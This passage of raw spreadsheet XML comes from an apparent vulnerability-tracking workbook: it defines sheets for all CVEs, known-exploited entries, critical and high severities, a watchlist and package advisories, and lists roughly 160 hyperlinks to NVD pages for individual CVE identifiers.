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KEV - Exploited" sheetId="3" state="visible" r:id="rId3"/>
    <sheet name="Critical &amp; High" sheetId="4" state="visible" r:id="rId4"/>
    <sheet name="Watchlist" sheetId="5" state="visible" r:id="rId5"/>
    <sheet name="Packages (GHSA-OSV)" sheetId="6" state="visible" r:id="rId6"/>
  </sheets>
  <definedNames>
    <definedName name="_xlnm._FilterDatabase" localSheetId="1" hidden="1">'All CVEs'!$A$1:$S$1368</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="2" hidden="1">'KEV - Exploited'!$A$1:$S$17</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="3" hidden="1">'Critical &amp; High'!$A$1:$S$642</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="4" hidden="1">'Watchlist'!$A$1:$S$40</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="5" hidden="1">'Packages (GHSA-OSV)'!$A$1:$S$100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75650" TargetMode="External" Id="rId1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86218" TargetMode="External" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58704" TargetMode="External" Id="rId3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87491" TargetMode="External" Id="rId4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-25249" TargetMode="External" Id="rId5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19490" TargetMode="External" Id="rId6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20079" TargetMode="External" Id="rId7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42016" TargetMode="External" Id="rId8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42018" TargetMode="External" Id="rId9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67277" TargetMode="External" Id="rId10" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76460" TargetMode="External" Id="rId11" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76461" TargetMode="External" Id="rId12" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84869" TargetMode="External" Id="rId13" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85706" TargetMode="External" Id="rId14" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86060" TargetMode="External" Id="rId15" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87886" TargetMode="External" Id="rId16" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54745" TargetMode="External" Id="rId17" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65956" TargetMode="External" Id="rId18" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79696" TargetMode="External" Id="rId19" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85061" TargetMode="External" Id="rId20" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85978" TargetMode="External" Id="rId21" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87827" TargetMode="External" Id="rId22" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55634" TargetMode="External" Id="rId23" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62283" TargetMode="External" Id="rId24" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67401" TargetMode="External" Id="rId25" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-67066" TargetMode="External" Id="rId26" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-70290" TargetMode="External" Id="rId27" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-70293" TargetMode="External" Id="rId28" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21095" TargetMode="External" Id="rId29" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21096" TargetMode="External" Id="rId30" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-36433" TargetMode="External" Id="rId31" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-37006" TargetMode="External" Id="rId32" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-37751" TargetMode="External" Id="rId33" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-41871" TargetMode="External" Id="rId34" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45018" TargetMode="External" Id="rId35" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50894" TargetMode="External" Id="rId36" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52103" TargetMode="External" Id="rId37" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52490" TargetMode="External" Id="rId38" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53611" TargetMode="External" Id="rId39" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54569" TargetMode="External" Id="rId40" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55546" TargetMode="External" Id="rId41" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56207" TargetMode="External" Id="rId42" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71624" TargetMode="External" Id="rId43" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71625" TargetMode="External" Id="rId44" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71801" TargetMode="External" Id="rId45" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71805" TargetMode="External" Id="rId46" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75325" TargetMode="External" Id="rId47" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75337" TargetMode="External" Id="rId48" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75338" TargetMode="External" Id="rId49" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76904" TargetMode="External" Id="rId50" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77649" TargetMode="External" Id="rId51" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77650" TargetMode="External" Id="rId52" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77651" TargetMode="External" Id="rId53" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-7861" TargetMode="External" Id="rId54" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78745" TargetMode="External" Id="rId55" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79391" TargetMode="External" Id="rId56" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79689" TargetMode="External" Id="rId57" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79941" TargetMode="External" Id="rId58" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80129" TargetMode="External" Id="rId59" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80131" TargetMode="External" Id="rId60" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80172" TargetMode="External" Id="rId61" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84372" TargetMode="External" Id="rId62" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85102" TargetMode="External" Id="rId63" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85103" TargetMode="External" Id="rId64" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85506" TargetMode="External" Id="rId65" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86478" TargetMode="External" Id="rId66" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86480" TargetMode="External" Id="rId67" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87534" TargetMode="External" Id="rId68" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87544" TargetMode="External" Id="rId69" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87595" TargetMode="External" Id="rId70" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53649" TargetMode="External" Id="rId71" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54523" TargetMode="External" Id="rId72" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54694" TargetMode="External" Id="rId73" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54754" TargetMode="External" Id="rId74" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54755" TargetMode="External" Id="rId75" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86751" TargetMode="External" Id="rId76" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87438" TargetMode="External" Id="rId77" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87448" TargetMode="External" Id="rId78" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87455" TargetMode="External" Id="rId79" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87464" TargetMode="External" Id="rId80" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87470" TargetMode="External" Id="rId81" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87474" TargetMode="External" Id="rId82" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87488" TargetMode="External" Id="rId83" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87492" TargetMode="External" Id="rId84" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87494" TargetMode="External" Id="rId85" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87500" TargetMode="External" Id="rId86" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87504" TargetMode="External" Id="rId87" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87512" TargetMode="External" Id="rId88" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87520" TargetMode="External" Id="rId89" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87526" TargetMode="External" Id="rId90" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87527" TargetMode="External" Id="rId91" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87528" TargetMode="External" Id="rId92" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87529" TargetMode="External" Id="rId93" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87547" TargetMode="External" Id="rId94" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87558" TargetMode="External" Id="rId95" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87581" TargetMode="External" Id="rId96" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87607" TargetMode="External" Id="rId97" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87609" TargetMode="External" Id="rId98" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87621" TargetMode="External" Id="rId99" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87634" TargetMode="External" Id="rId100" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87637" TargetMode="External" Id="rId101" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87638" TargetMode="External" Id="rId102" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87643" TargetMode="External" Id="rId103" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87646" TargetMode="External" Id="rId104" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87650" TargetMode="External" Id="rId105" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87654" TargetMode="External" Id="rId106" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-39975" TargetMode="External" Id="rId107" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16876" TargetMode="External" Id="rId108" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47156" TargetMode="External" Id="rId109" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48996" TargetMode="External" Id="rId110" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-51106" TargetMode="External" Id="rId111" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53578" TargetMode="External" Id="rId112" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53579" TargetMode="External" Id="rId113" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53670" TargetMode="External" Id="rId114" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53671" TargetMode="External" Id="rId115" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55220" TargetMode="External" Id="rId116" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55378" TargetMode="External" Id="rId117" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57910" TargetMode="External" Id="rId118" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63310" TargetMode="External" Id="rId119" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65641" TargetMode="External" Id="rId120" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68929" TargetMode="External" Id="rId121" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73251" TargetMode="External" Id="rId122" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77413" TargetMode="External" Id="rId123" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77414" TargetMode="External" Id="rId124" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77415" TargetMode="External" Id="rId125" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77644" TargetMode="External" Id="rId126" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77776" TargetMode="External" Id="rId127" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85391" TargetMode="External" Id="rId128" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87929" TargetMode="External" Id="rId129" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88069" TargetMode="External" Id="rId130" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63382" TargetMode="External" Id="rId131" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63385" TargetMode="External" Id="rId132" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67276" TargetMode="External" Id="rId133" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67402" TargetMode="External" Id="rId134" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77645" TargetMode="External" Id="rId135" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82090" TargetMode="External" Id="rId136" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87930" TargetMode="External" Id="rId137" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-51679" TargetMode="External" Id="rId138" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16272" TargetMode="External" Id="rId139" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-22590" TargetMode="External" Id="rId140" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-41869" TargetMode="External" Id="rId141" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49849" TargetMode="External" Id="rId142" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52766" TargetMode="External" Id="rId143" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53939" TargetMode="External" Id="rId144" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55247" TargetMode="External" Id="rId145" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55248" TargetMode="External" Id="rId146" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55536" TargetMode="External" Id="rId147" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55640" TargetMode="External" Id="rId148" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57499" TargetMode="External" Id="rId149" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58400" TargetMode="External" Id="rId150" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62862" TargetMode="External" Id="rId151" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73253" TargetMode="External" Id="rId152" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73256" TargetMode="External" Id="rId153" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73257" TargetMode="External" Id="rId154" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75340" TargetMode="External" Id="rId155" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77337" TargetMode="External" Id="rId156" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80164" TargetMode="External" Id="rId157" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86419" TargetMode="External" Id="rId158" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87806" TargetMode="External" Id="rId159" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67403" TargetMode="External" Id="rId160" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68484" TargetMode="External" Id="rId161" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75604" TargetMode="External" Id="rId162" /><Relationship 